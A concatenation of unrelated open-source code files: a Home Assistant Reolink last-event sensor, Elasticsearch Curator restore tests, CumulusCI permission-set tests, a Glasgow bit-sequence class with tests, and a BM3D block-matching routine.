import homeassistant.util.dt as dt_utils
from homeassistant.config_entries import ConfigEntry
from homeassistant.components.sensor import DEVICE_CLASS_TIMESTAMP, SensorEntity
from .const import (
BASE,
DOMAIN,
DOMAIN_DATA,
LAST_EVENT,
THUMBNAIL_EXTENSION,
THUMBNAIL_URL,
VOD_URL,
)
from .entity import ReolinkEntity
from .base import ReolinkBase, searchtime_to_datetime
from .typings import VoDEvent, VoDEventThumbnail
_LOGGER = logging.getLogger(__name__)
@asyncio.coroutine
async def async_setup_entry(hass: HomeAssistant, config_entry, async_add_devices):
"""Set up the Reolink IP Camera switches."""
devices = []
base: ReolinkBase = hass.data[DOMAIN][config_entry.entry_id][BASE]
# TODO : add playback (based off of hdd_info) to api capabilities
await base.api.get_switch_capabilities()
if base.api.hdd_info:
devices.append(LastEventSensor(hass, config_entry))
async_add_devices(devices, update_before_add=False)
@dataclass
class _Attrs:
oldest_day: dt.datetime = None
most_recent_day: dt.datetime = None
last_event: VoDEvent = None
class LastEventSensor(ReolinkEntity, SensorEntity):
"""An implementation of a Reolink IP camera sensor."""
def __init__(self, hass: HomeAssistant, config: ConfigEntry):
"""Initialize a Reolink camera."""
ReolinkEntity.__init__(self, hass, config)
SensorEntity.__init__(self)
self._attrs = _Attrs()
self._bus_listener: CALLBACK_TYPE = None
self._entry_id = config.entry_id
async def async_added_to_hass(self) -> None:
"""Entity created."""
await super().async_added_to_hass()
self._bus_listener = self.hass.bus.async_listen(
self._base.event_id, self.handle_event
)
self._hass.async_add_job(self._update_event_range)
async def async_will_remove_from_hass(self):
"""Entity removed"""
if self._bus_listener:
self._bus_listener()
self._bus_listener = None
await super().async_will_remove_from_hass()
async def request_refresh(self):
""" force an update of the sensor """
await super().request_refresh()
self._hass.async_add_job(self._update_event_range)
async def async_update(self):
""" polling update """
await super().async_update()
self._hass.async_add_job(self._update_event_range)
async def _update_event_range(self):
end = dt_utils.now()
start = self._attrs.most_recent_day
if not start:
start = dt.datetime.combine(end.date().replace(day=1), dt.time.min)
if self._base.playback_months > 1:
start -= relativedelta.relativedelta(
months=int(self._base.playback_months)
)
search, _ = await self._base.send_search(start, end, True)
if not search or len(search) < 1:
return
entry = search[0]
self._attrs.oldest_day = dt.datetime(
entry["year"],
entry["mon"],
next((i for (i, e) in enumerate(entry["table"], start=1) if e == "1")),
tzinfo=end.tzinfo,
)
entry = search[-1]
start = self._attrs.most_recent_day = dt.datetime(
entry["year"],
entry["mon"],
len(entry["table"])
- next(
(
i
for (i, e) in enumerate(reversed(entry["table"]), start=0)
if e == "1"
)
),
tzinfo=end.tzinfo,
)
end = dt.datetime.combine(start.date(), dt.time.max, tzinfo=end.tzinfo)
_, files = await self._base.send_search(start, end)
file = files[-1] if files and len(files) > 0 else None
if file is None:
return
filename = file.get("name", "")
if len(filename) == 0:
_LOGGER.info("Search command provided a file record without a name: %s", str(file))
end = searchtime_to_datetime(file["EndTime"], start.tzinfo)
start = searchtime_to_datetime(file["StartTime"], end.tzinfo)
last = self._attrs.last_event = VoDEvent(
str(start.timestamp()),
start,
end - start,
filename,
)
last.url = VOD_URL.format(
camera_id=self._entry_id, event_id=quote_plus(filename)
)
thumbnail = last.thumbnail = VoDEventThumbnail(
THUMBNAIL_URL.format(camera_id=self._entry_id, event_id=last.event_id),
path=os.path.join(
self._base.thumbnail_path, f"{last.event_id}.{THUMBNAIL_EXTENSION}"
),
)
thumbnail.exists = os.path.isfile(thumbnail.path)
data: dict = self._hass.data.setdefault(DOMAIN_DATA, {})
data = data.setdefault(self._base.unique_id, {})
data[LAST_EVENT] = last
self._state = True
self.async_schedule_update_ha_state()
async def handle_event(self, event):
"""Handle incoming event for VoD update"""
if not "motion" in event.data:
return
self._hass.async_add_job(self._update_event_range)
@property
def unique_id(self):
"""Return Unique ID string."""
return f"reolink_lastevent_{self._base.unique_id}"
@property
def name(self):
"""Return the name of this sensor."""
return f"{self._base.name} Last Event"
@property
def device_class(self):
"""Device class of the sensor."""
return DEVICE_CLASS_TIMESTAMP
@property
def state(self):
"""Return the state of the sensor."""
if not self._state:
return None
date = (
self._attrs.last_event.start
if self._attrs.last_event and self._attrs.last_event.start
else None
)
if not date:
return None
return date.isoformat()
@property
def icon(self):
"""Icon of the sensor."""
return "mdi:history"
@property
def extra_state_attributes(self):
"""Return the state attributes."""
attrs = super().extra_state_attributes
if self._state:
if attrs is None:
attrs = {}
if self._attrs.oldest_day:
attrs["oldest_day"] = self._attrs.oldest_day.isoformat()
if self._attrs.last_event:
if self._attrs.last_event.event_id:
attrs["vod_event_id"] = self._attrs.last_event.event_id
if self._attrs.last_event.thumbnail:
attrs["has_thumbnail"] = (
"true"
if self._attrs.last_event.thumbnail.exists
else "false"
)
attrs["thumbnail_path"] = self._attrs.last_event.thumbnail.path
if self._attrs.last_event.duration:
attrs["duration"] = str(self._attrs.last_event.duration)
return attrs
|
test/unit/test_action_restore.py | ssavrim/curator | 2,449 | 12685791 | from unittest import TestCase
from mock import Mock, patch
import elasticsearch
import curator
# Get test variables and constants from a single source
from . import testvars as testvars
class TestActionRestore(TestCase):
def test_init_raise_bad_snapshot_list(self):
self.assertRaises(TypeError, curator.Restore, 'invalid')
def test_init_raise_unsuccessful_snapshot_list(self):
client = Mock()
client.snapshot.get.return_value = testvars.partial
client.snapshot.get_repository.return_value = testvars.test_repo
slo = curator.SnapshotList(client, repository=testvars.repo_name)
self.assertRaises(curator.CuratorException, curator.Restore, slo)
def test_snapshot_derived_name(self):
client = Mock()
client.snapshot.get.return_value = testvars.snapshots
client.snapshot.get_repository.return_value = testvars.test_repo
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(slo)
self.assertEqual('snapshot-2015.03.01', ro.name)
def test_provided_name(self):
client = Mock()
client.snapshot.get.return_value = testvars.snapshots
client.snapshot.get_repository.return_value = testvars.test_repo
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(slo, name=testvars.snap_name)
self.assertEqual(testvars.snap_name, ro.name)
def test_partial_snap(self):
client = Mock()
client.snapshot.get.return_value = testvars.partial
client.snapshot.get_repository.return_value = testvars.test_repo
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(slo, partial=True)
self.assertEqual(testvars.snap_name, ro.name)
def test_provided_indices(self):
client = Mock()
client.snapshot.get.return_value = testvars.snapshots
client.snapshot.get_repository.return_value = testvars.test_repo
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(slo, indices=testvars.named_indices)
self.assertEqual('snapshot-2015.03.01', ro.name)
def test_extra_settings(self):
client = Mock()
client.snapshot.get.return_value = testvars.snapshots
client.snapshot.get_repository.return_value = testvars.test_repo
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(slo, extra_settings={'foo':'bar'})
self.assertEqual(ro.body['foo'], 'bar')
def test_bad_extra_settings(self):
client = Mock()
client.snapshot.get.return_value = testvars.snapshots
client.snapshot.get_repository.return_value = testvars.test_repo
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(slo, extra_settings='invalid')
self.assertEqual(ro.body,
{
'ignore_unavailable': False,
'partial': False,
'include_aliases': False,
'rename_replacement': '',
'rename_pattern': '',
'indices': ['index-2015.01.01', 'index-2015.02.01'],
'include_global_state': False
}
)
def test_get_expected_output(self):
client = Mock()
client.snapshot.get.return_value = testvars.snapshots
client.snapshot.get_repository.return_value = testvars.test_repo
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(
slo, rename_pattern='(.+)', rename_replacement='new_$1')
self.assertEqual(
ro.expected_output,
['new_index-2015.01.01', 'new_index-2015.02.01']
)
def test_do_dry_run(self):
client = Mock()
client.snapshot.get.return_value = testvars.snapshots
client.snapshot.get_repository.return_value = testvars.test_repo
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(slo)
self.assertIsNone(ro.do_dry_run())
def test_do_dry_run_with_renames(self):
client = Mock()
client.snapshot.get.return_value = testvars.snapshots
client.snapshot.get_repository.return_value = testvars.test_repo
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(
slo, rename_pattern='(.+)', rename_replacement='new_$1')
self.assertIsNone(ro.do_dry_run())
def test_report_state_all(self):
client = Mock()
client.info.return_value = {'version': {'number': '5.0.0'} }
client.snapshot.get.return_value = testvars.snapshot
client.snapshot.get_repository.return_value = testvars.test_repo
client.indices.get_settings.return_value = testvars.settings_named
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(slo)
self.assertIsNone(ro.report_state())
def test_report_state_not_all(self):
client = Mock()
client.info.return_value = {'version': {'number': '5.0.0'} }
client.snapshot.get.return_value = testvars.snapshots
client.snapshot.get_repository.return_value = testvars.test_repo
client.indices.get_settings.return_value = testvars.settings_one
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(
slo, rename_pattern='(.+)', rename_replacement='new_$1')
self.assertRaises(curator.exceptions.FailedRestore, ro.report_state)
def test_do_action_success(self):
client = Mock()
client.info.return_value = {'version': {'number': '5.0.0'} }
client.snapshot.get.return_value = testvars.snapshots
client.snapshot.get_repository.return_value = testvars.test_repo
client.snapshot.status.return_value = testvars.nosnap_running
client.snapshot.verify_repository.return_value = testvars.verified_nodes
client.indices.get_settings.return_value = testvars.settings_named
client.indices.recovery.return_value = testvars.recovery_output
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(slo, wait_interval=0.5, max_wait=1)
self.assertIsNone(ro.do_action())
def test_do_action_snap_in_progress(self):
client = Mock()
client.snapshot.get.return_value = testvars.snapshots
client.snapshot.get_repository.return_value = testvars.test_repo
client.snapshot.status.return_value = testvars.snap_running
client.snapshot.verify_repository.return_value = testvars.verified_nodes
client.indices.get_settings.return_value = testvars.settings_named
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(slo)
self.assertRaises(curator.SnapshotInProgress, ro.do_action)
def test_do_action_success_no_wfc(self):
client = Mock()
client.snapshot.get.return_value = testvars.snapshots
client.snapshot.get_repository.return_value = testvars.test_repo
client.snapshot.status.return_value = testvars.nosnap_running
client.snapshot.verify_repository.return_value = testvars.verified_nodes
client.indices.get_settings.return_value = testvars.settings_named
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(slo, wait_for_completion=False)
self.assertIsNone(ro.do_action())
def test_do_action_report_on_failure(self):
client = Mock()
client.snapshot.get.return_value = testvars.snapshots
client.snapshot.get_repository.return_value = testvars.test_repo
client.snapshot.status.return_value = testvars.nosnap_running
client.snapshot.verify_repository.return_value = testvars.verified_nodes
client.indices.get_settings.return_value = testvars.settings_named
client.snapshot.restore.side_effect = testvars.fake_fail
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(slo)
self.assertRaises(curator.FailedExecution, ro.do_action)
|
cumulusci/tasks/metadata_etl/tests/test_permissions.py | davisagli/CumulusCI | 163 | 12685792 | <filename>cumulusci/tasks/metadata_etl/tests/test_permissions.py<gh_stars>100-1000
import pytest
from cumulusci.core.exceptions import TaskOptionsError
from cumulusci.tasks.metadata_etl import AddPermissionSetPermissions
from cumulusci.tasks.salesforce.tests.util import create_task
from cumulusci.utils.xml import metadata_tree
MD = "{%s}" % metadata_tree.METADATA_NAMESPACE
PERMSET_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<PermissionSet xmlns="http://soap.sforce.com/2006/04/metadata">
<applicationVisibilities>
<application>CustomApp</application>
<visible>false</visible>
</applicationVisibilities>
<classAccesses>
<apexClass>ApexController</apexClass>
<enabled>false</enabled>
</classAccesses>
<fieldPermissions>
<editable>false</editable>
<field>Test__c.Lookup__c</field>
<readable>false</readable>
</fieldPermissions>
<hasActivationRequired>false</hasActivationRequired>
<label>Test</label>
<objectPermissions>
<allowCreate>false</allowCreate>
<allowDelete>false</allowDelete>
<allowEdit>false</allowEdit>
<allowRead>false</allowRead>
<modifyAllRecords>false</modifyAllRecords>
<object>Test__c</object>
<viewAllRecords>false</viewAllRecords>
</objectPermissions>
<recordTypeVisibilities>
<recordType>Case.Test</recordType>
<visible>true</visible>
</recordTypeVisibilities>
<tabSettings>
<tab>standard-report</tab>
<visibility>Visible</visibility>
</tabSettings>
<userPermissions>
<enabled>true</enabled>
<name>ActivitiesAccess</name>
</userPermissions>
</PermissionSet>
"""
class TestAddPermissionSetPermissions:
def test_adds_new_field_permission(self):
task = create_task(
AddPermissionSetPermissions,
{
"managed": True,
"api_version": "47.0",
"api_names": "bar,foo",
"field_permissions": [
{
"field": "Test__c.Description__c",
"readable": True,
"editable": True,
}
],
},
)
tree = metadata_tree.fromstring(PERMSET_XML)
element = tree._element
assert (
len(
element.findall(
f".//{MD}fieldPermissions[{MD}field='Test__c.Description__c']"
)
)
== 0
)
task._transform_entity(tree, "PermSet")
fieldPermissions = element.findall(
f".//{MD}fieldPermissions[{MD}field='Test__c.Description__c']"
)
assert len(fieldPermissions) == 1
readable = fieldPermissions[0].findall(f".//{MD}readable")
assert len(readable) == 1
assert readable[0].text == "true"
editable = fieldPermissions[0].findall(f".//{MD}editable")
assert len(editable) == 1
assert editable[0].text == "true"
def test_updates_existing_field_permission(self):
task = create_task(
AddPermissionSetPermissions,
{
"managed": True,
"api_version": "47.0",
"api_names": "bar,foo",
"field_permissions": [
{"field": "Test__c.Lookup__c", "readable": True, "editable": True}
],
},
)
tree = metadata_tree.fromstring(PERMSET_XML)
element = tree._element
assert (
len(
element.findall(
f".//{MD}fieldPermissions[{MD}field='Test__c.Lookup__c']"
)
)
== 1
)
task._transform_entity(tree, "PermSet")._element
fieldPermissions = element.findall(
f".//{MD}fieldPermissions[{MD}field='Test__c.Lookup__c']"
)
assert len(fieldPermissions) == 1
readable = fieldPermissions[0].findall(f".//{MD}readable")
assert len(readable) == 1
assert readable[0].text == "true"
editable = fieldPermissions[0].findall(f".//{MD}editable")
assert len(editable) == 1
assert editable[0].text == "true"
def test_adds_new_class_permission(self):
task = create_task(
AddPermissionSetPermissions,
{
"managed": True,
"api_version": "47.0",
"api_names": "bar,foo",
"class_accesses": [{"apexClass": "LWCController", "enabled": True}],
},
)
tree = metadata_tree.fromstring(PERMSET_XML)
element = tree._element
assert (
len(element.findall(f".//{MD}classAccesses[{MD}apexClass='LWCController']"))
== 0
)
task._transform_entity(tree, "PermSet")
classAccesses = element.findall(
f".//{MD}classAccesses[{MD}apexClass='LWCController']"
)
assert len(classAccesses) == 1
enabled = classAccesses[0].findall(f".//{MD}enabled")
assert len(enabled) == 1
assert enabled[0].text == "true"
def test_upserts_existing_class_permission(self):
task = create_task(
AddPermissionSetPermissions,
{
"managed": True,
"api_version": "47.0",
"api_names": "bar,foo",
"class_accesses": [{"apexClass": "ApexController", "enabled": True}],
},
)
tree = metadata_tree.fromstring(PERMSET_XML)
element = tree._element
assert (
len(
element.findall(f".//{MD}classAccesses[{MD}apexClass='ApexController']")
)
== 1
)
task._transform_entity(tree, "PermSet")._element
classAccesses = element.findall(
f".//{MD}classAccesses[{MD}apexClass='ApexController']"
)
assert len(classAccesses) == 1
enabled = classAccesses[0].findall(f".//{MD}enabled")
assert len(enabled) == 1
assert enabled[0].text == "true"
def test_missing_apexclass_throws_exception(self):
task = create_task(
AddPermissionSetPermissions,
{
"managed": True,
"api_version": "47.0",
"api_names": "bar,foo",
"class_accesses": [{"enabled": True}],
},
)
tree = metadata_tree.fromstring(PERMSET_XML)
with pytest.raises(TaskOptionsError):
task._transform_entity(tree, "PermSet")
def test_missing_field_throws_exception(self):
task = create_task(
AddPermissionSetPermissions,
{
"managed": True,
"api_version": "47.0",
"api_names": "bar,foo",
"field_permissions": [{"readable": True}],
},
)
tree = metadata_tree.fromstring(PERMSET_XML)
with pytest.raises(TaskOptionsError):
task._transform_entity(tree, "PermSet")
|
software/glasgow/support/bits.py | tmbinc/glasgow | 1,014 | 12685794 | import re
import operator
from functools import reduce
import collections.abc
__all__ = ["bits"]
class bits:
"""An immutable bit sequence, like ``bytes`` but for bits.
This bit sequence is ordered from LSB to MSB; this is the direction in which it is converted
to and from iterators, and to and from bytes. Note, however, that it is converted to and from
strings (which should be only used where a human-readable form is required) from MSB to LSB;
this matches the way integer literals are written, as well as values in datasheets and other
documentation.
"""
__slots__ = ["_len_", "_int_"]
@classmethod
def from_int(cls, value, length=None):
value = operator.index(value)
if length is None:
if value < 0:
raise ValueError("invalid negative input for bits(): '{}'".format(value))
length = value.bit_length()
else:
length = operator.index(length)
value &= ~(-1 << length)
inst = object.__new__(cls)
inst._len_ = length
inst._int_ = value
return inst
@classmethod
def from_str(cls, value):
value = re.sub(r"[\s_]", "", value)
if value:
if value[0] == "-":
raise ValueError("invalid negative input for bits(): '{}'".format(value))
elif value[0] == "+":
length = len(value) - 1
else:
length = len(value)
return cls.from_int(int(value, 2), length)
else:
return cls.from_int(0)
@classmethod
def from_iter(cls, iterator):
length = -1
value = 0
for length, bit in enumerate(iterator):
value |= bool(bit) << length
return cls.from_int(value, length + 1)
@classmethod
def from_bytes(cls, value, length):
return cls.from_int(int.from_bytes(value, "little"), length)
def __new__(cls, value=0, length=None):
if isinstance(value, cls):
if length is None:
return value
else:
return cls.from_int(value._int_, length)
if isinstance(value, int):
return cls.from_int(value, length)
if isinstance(value, str):
if length is not None:
raise ValueError("invalid input for bits(): when converting from str "
"length must not be provided")
return cls.from_str(value)
if isinstance(value, (bytes, bytearray, memoryview)):
if length is None:
raise ValueError("invalid input for bits(): when converting from bytes "
"length must be provided")
return cls.from_bytes(value, length)
if isinstance(value, collections.abc.Iterable):
if length is not None:
raise ValueError("invalid input for bits(): when converting from an iterable "
"length must not be provided")
return cls.from_iter(value)
raise TypeError("invalid input for bits(): cannot convert from {}"
.format(value.__class__.__name__))
def __len__(self):
return self._len_
def __bool__(self):
return bool(self._len_)
def to_int(self):
return self._int_
__int__ = to_int
def to_str(self):
if self._len_:
return format(self._int_, "0{}b".format(self._len_))
return ""
__str__ = to_str
def to_bytes(self):
return self._int_.to_bytes((self._len_ + 7) // 8, "little")
__bytes__ = to_bytes
def __repr__(self):
return "bits('{}')".format(self)
def __getitem__(self, key):
if isinstance(key, int):
if key < 0:
return (self._int_ >> (self._len_ + key)) & 1
else:
return (self._int_ >> key) & 1
if isinstance(key, slice):
start, stop, step = key.indices(self._len_)
assert step == 1
if stop < start:
return self.__class__()
else:
return self.__class__(self._int_ >> start, stop - start)
raise TypeError("bits indices must be integers or slices, not {}"
.format(key.__class__.__name__))
def __iter__(self):
for bit in range(self._len_):
yield (self._int_ >> bit) & 1
def __eq__(self, other):
try:
other = self.__class__(other)
except TypeError:
return False
return self._len_ == other._len_ and self._int_ == other._int_
def __add__(self, other):
other = self.__class__(other)
return self.__class__(self._int_ | (other._int_ << self._len_),
self._len_ + other._len_)
def __radd__(self, other):
other = self.__class__(other)
return other + self
def __mul__(self, other):
if isinstance(other, int):
return self.__class__(reduce(lambda a, b: (a << self._len_) | b,
(self._int_ for _ in range(other)), 0),
self._len_ * other)
return NotImplemented
def __rmul__(self, other):
return self * other
def __and__(self, other):
other = self.__class__(other)
return self.__class__(self._int_ & other._int_, max(self._len_, other._len_))
def __rand__(self, other):
other = self.__class__(other)
return self & other
def __or__(self, other):
other = self.__class__(other)
return self.__class__(self._int_ | other._int_, max(self._len_, other._len_))
def __ror__(self, other):
other = self.__class__(other)
return self | other
def __xor__(self, other):
other = self.__class__(other)
return self.__class__(self._int_ ^ other._int_, max(self._len_, other._len_))
def __rxor__(self, other):
other = self.__class__(other)
return self ^ other
def reversed(self):
value = 0
for bit in range(self._len_):
value <<= 1
if (self._int_ >> bit) & 1:
value |= 1
return self.__class__(value, self._len_)
def find(self, sub, start=0, end=-1):
sub = self.__class__(sub)
if start < 0:
start = self._len_ - start
if end < 0:
end = self._len_ - end
for pos in range(start, end):
if self[pos:pos + len(sub)] == sub:
return pos
else:
return -1
# -------------------------------------------------------------------------------------------------
import unittest
class BitsTestCase(unittest.TestCase):
def assertBits(self, value, bit_length, bit_value):
self.assertIsInstance(value, bits)
self.assertEqual(value._len_, bit_length)
self.assertEqual(value._int_, bit_value)
def test_from_int(self):
self.assertBits(bits.from_int(0), 0, 0b0)
self.assertBits(bits.from_int(1), 1, 0b1)
self.assertBits(bits.from_int(2), 2, 0b10)
self.assertBits(bits.from_int(2, 5), 5, 0b00010)
self.assertBits(bits.from_int(0b110, 2), 2, 0b10)
self.assertBits(bits.from_int(-1, 16), 16, 0xffff)
def test_from_int_wrong(self):
with self.assertRaisesRegex(ValueError,
r"invalid negative input for bits\(\): '-1'"):
bits.from_int(-1)
def test_from_str(self):
self.assertBits(bits.from_str(""), 0, 0b0)
self.assertBits(bits.from_str("0"), 1, 0b0)
self.assertBits(bits.from_str("010"), 3, 0b010)
self.assertBits(bits.from_str("0 1 011_100"), 8, 0b01011100)
self.assertBits(bits.from_str("+0 1 \t011_100"), 8, 0b01011100)
def test_from_str_wrong(self):
with self.assertRaisesRegex(ValueError,
r"invalid negative input for bits\(\): '-1'"):
bits.from_str("-1")
with self.assertRaisesRegex(ValueError,
r"invalid literal for int\(\) with base 2: '23'"):
bits.from_str("23")
def test_from_bytes(self):
self.assertBits(bits.from_bytes(b"\xa5", 8), 8, 0b10100101)
self.assertBits(bits.from_bytes(b"\xa5\x01", 9), 9, 0b110100101)
self.assertBits(bits.from_bytes(b"\xa5\xff", 9), 9, 0b110100101)
def test_from_iter(self):
self.assertBits(bits.from_iter(iter([])), 0, 0b0)
self.assertBits(bits.from_iter(iter([1,1,0,1,0,0,1])), 7, 0b1001011)
def test_new(self):
self.assertBits(bits(), 0, 0b0)
self.assertBits(bits(10), 4, 0b1010)
self.assertBits(bits(10, 2), 2, 0b10)
self.assertBits(bits("1001"), 4, 0b1001)
self.assertBits(bits(b"\xa5\x01", 9), 9, 0b110100101)
self.assertBits(bits(bytearray(b"\xa5\x01"), 9), 9, 0b110100101)
self.assertBits(bits(memoryview(b"\xa5\x01"), 9), 9, 0b110100101)
self.assertBits(bits([1,1,0,1,0,0,1]), 7, 0b1001011)
self.assertBits(bits(bits("1001"), 2), 2, 0b01)
some = bits("1001")
self.assertIs(bits(some), some)
def test_new_wrong(self):
with self.assertRaisesRegex(TypeError,
r"invalid input for bits\(\): cannot convert from float"):
bits(1.0)
with self.assertRaisesRegex(ValueError,
r"invalid input for bits\(\): when converting from str "
r"length must not be provided"):
bits("1010", 5)
with self.assertRaisesRegex(ValueError,
r"invalid input for bits\(\): when converting from bytes "
r"length must be provided"):
bits(b"\xa5")
with self.assertRaisesRegex(ValueError,
r"invalid input for bits\(\): when converting from an iterable "
r"length must not be provided"):
bits([1,0,1,0], 5)
def test_len(self):
self.assertEqual(len(bits(10)), 4)
def test_bool(self):
self.assertFalse(bits(""))
self.assertTrue(bits("1"))
self.assertTrue(bits("01"))
self.assertTrue(bits("0"))
self.assertTrue(bits("00"))
def test_int(self):
self.assertEqual(int(bits("1010")), 0b1010)
def test_str(self):
self.assertEqual(str(bits("")), "")
self.assertEqual(str(bits("0000")), "0000")
self.assertEqual(str(bits("1010")), "1010")
self.assertEqual(str(bits("01010")), "01010")
def test_bytes(self):
self.assertEqual(bytes(bits("")), b"")
self.assertEqual(bytes(bits("10100101")), b"\xa5")
self.assertEqual(bytes(bits("110100101")), b"\xa5\x01")
def test_repr(self):
self.assertEqual(repr(bits("")), r"bits('')")
self.assertEqual(repr(bits("1010")), r"bits('1010')")
def test_getitem_int(self):
some = bits("10001001011")
self.assertEqual(some[0], 1)
self.assertEqual(some[2], 0)
self.assertEqual(some[5], 0)
self.assertEqual(some[-1], 1)
self.assertEqual(some[-2], 0)
self.assertEqual(some[-5], 1)
def test_getitem_slice(self):
some = bits("10001001011")
self.assertBits(some[:], 11, 0b10001001011)
self.assertBits(some[2:], 9, 0b100010010)
self.assertBits(some[2:9], 7, 0b0010010)
self.assertBits(some[2:-2], 7, 0b0010010)
self.assertBits(some[3:2], 0, 0b0)
def test_getitem_wrong(self):
with self.assertRaisesRegex(TypeError,
r"bits indices must be integers or slices, not str"):
bits()["x"]
def test_iter(self):
some = bits("10001001011")
self.assertEqual(list(some), [1,1,0,1,0,0,1,0,0,0,1])
def test_eq(self):
self.assertEqual(bits("1010"), 0b1010)
self.assertEqual(bits("1010"), "1010")
self.assertEqual(bits("1010"), bits("1010"))
self.assertNotEqual(bits("0010"), 0b0010)
self.assertNotEqual(bits("0010"), "010")
self.assertNotEqual(bits("1010"), bits("01010"))
self.assertNotEqual(bits("1010"), None)
def test_add(self):
self.assertBits(bits("1010") + bits("1110"), 8, 0b11101010)
self.assertBits(bits("1010") + (0,1,1,1), 8, 0b11101010)
self.assertBits((0,1,1,1) + bits("1010"), 8, 0b10101110)
def test_mul(self):
self.assertBits(bits("1011") * 4, 16, 0b1011101110111011)
self.assertBits(4 * bits("1011"), 16, 0b1011101110111011)
def test_and(self):
self.assertBits(bits("1010") & bits("1100"), 4, 0b1000)
self.assertBits(bits("1010") & "1100", 4, 0b1000)
self.assertBits((0,1,0,1) & bits("1100"), 4, 0b1000)
def test_or(self):
self.assertBits(bits("1010") | bits("1100"), 4, 0b1110)
self.assertBits(bits("1010") | "1100", 4, 0b1110)
self.assertBits((0,1,0,1) | bits("1100"), 4, 0b1110)
def test_xor(self):
self.assertBits(bits("1010") ^ bits("1100"), 4, 0b0110)
self.assertBits(bits("1010") ^ "1100", 4, 0b0110)
self.assertBits((0,1,0,1) ^ bits("1100"), 4, 0b0110)
def test_reversed(self):
self.assertBits(bits("1010").reversed(), 4, 0b0101)
def test_find(self):
self.assertEqual(bits("1011").find(bits("11")), 0)
self.assertEqual(bits("1011").find(bits("10")), 2)
self.assertEqual(bits("1011").find(bits("01")), 1)
self.assertEqual(bits("1011").find(bits("00")), -1)
self.assertEqual(bits("101100101").find(bits("10"), 0), 1)
self.assertEqual(bits("101100101").find(bits("10"), 2), 4)
self.assertEqual(bits("101100101").find(bits("10"), 5), 7)
self.assertEqual(bits("101100101").find(bits("10"), 8), -1)
self.assertEqual(bits("1011").find(bits((1,0))), 1)
|
precompute_BM_2ed.py | fevorl/BM3D_py | 157 | 12685795 | import numpy as np
def precompute_BM(img, kHW, NHW, nHW, tauMatch):
"""
:search for similar patches
:param img: input image
:param kHW: length of side of patch
:param NHW: how many patches are stacked
:param nHW: length of side of search area
:param tauMatch: threshold determine whether two patches are similar
:return ri_rj_N__ni_nj: The top N most similar patches to the referred patch
:return threshold_count: according to tauMatch how many patches are similar to the referred one
"""
img = img.astype(np.float64)
height, width = img.shape
Ns = 2 * nHW + 1
threshold = tauMatch * kHW * kHW
sum_table = np.ones((Ns, Ns, height, width)) * 2 * threshold # di, dj, ph, pw
row_add_mat, column_add_mat = get_add_patch_matrix(height, width, nHW, kHW)
diff_margin = np.pad(np.ones((height - 2 * nHW, width - 2 * nHW)), nHW, 'constant', constant_values=0.)
sum_margin = (1 - diff_margin) * 2 * threshold
for di in range(-nHW, nHW + 1):
for dj in range(-nHW, nHW + 1):
t_img = translation_2d_mat(img, right=-dj, down=-di)
diff_table_2 = (img - t_img) * (img - t_img) * diff_margin
sum_diff_2 = row_add_mat @ diff_table_2 @ column_add_mat
sum_table[di + nHW, dj + nHW] = np.maximum(sum_diff_2, sum_margin) # sum_table (2n+1, 2n+1, height, width)
sum_table = sum_table.reshape((Ns * Ns, height * width)) # di_dj, ph_pw
sum_table_T = sum_table.transpose((1, 0)) # ph_pw__di_dj
argsort = np.argpartition(sum_table_T, range(NHW))[:, :NHW]
argsort[:, 0] = (Ns * Ns - 1) // 2
argsort_di = argsort // Ns - nHW
argsort_dj = argsort % Ns - nHW
near_pi = argsort_di.reshape((height, width, -1)) + np.arange(height)[:, np.newaxis, np.newaxis]
near_pj = argsort_dj.reshape((height, width, -1)) + np.arange(width)[np.newaxis, :, np.newaxis]
ri_rj_N__ni_nj = np.concatenate((near_pi[:, :, :, np.newaxis], near_pj[:, :, :, np.newaxis]), axis=-1)
sum_filter = np.where(sum_table_T < threshold, 1, 0)
threshold_count = np.sum(sum_filter, axis=1)
threshold_count = closest_power_of_2(threshold_count, max_=NHW)
threshold_count = threshold_count.reshape((height, width))
return ri_rj_N__ni_nj, threshold_count
def get_add_patch_matrix(h, w, nHW, kHW):
row_add = np.eye(h - 2 * nHW)
row_add = np.pad(row_add, nHW, 'constant')
row_add_mat = row_add.copy()
for k in range(1, kHW):
row_add_mat += translation_2d_mat(row_add, right=k, down=0)
column_add = np.eye(w - 2 * nHW)
column_add = np.pad(column_add, nHW, 'constant')
column_add_mat = column_add.copy()
for k in range(1, kHW):
column_add_mat += translation_2d_mat(column_add, right=0, down=k)
return row_add_mat, column_add_mat
def translation_2d_mat(mat, right, down):
mat = np.roll(mat, right, axis=1)
mat = np.roll(mat, down, axis=0)
return mat
def closest_power_of_2(M, max_):
M = np.where(max_ < M, max_, M)
while max_ > 1:
M = np.where((max_ // 2 < M) * (M < max_), max_ // 2, M)
max_ //= 2
return M
if __name__ == '__main__':
import os
import cv2
from utils import add_gaussian_noise, symetrize
# <hyper parameter>
# ref_i, ref_j = 196, 142
ref_i, ref_j = 164, 135
# ref_i, ref_j = 271, 206
kHW = 8
NHW = 3
nHW = 16
tauMatch = 2500
# <hyper parameter \>
im = cv2.imread('test_data/image/Cameraman.png', cv2.IMREAD_GRAYSCALE)
im = im[100:, :]
ref_i, ref_j = 64, 135
im_noisy = add_gaussian_noise(im, 10, seed=1)
img_noisy_p = symetrize(im_noisy, nHW)
near_pij, threshold_count = precompute_BM(img_noisy_p, kHW=kHW, NHW=NHW, nHW=nHW, tauMatch=tauMatch)
im = cv2.cvtColor(img_noisy_p, cv2.COLOR_GRAY2RGB)
# <draw search area>
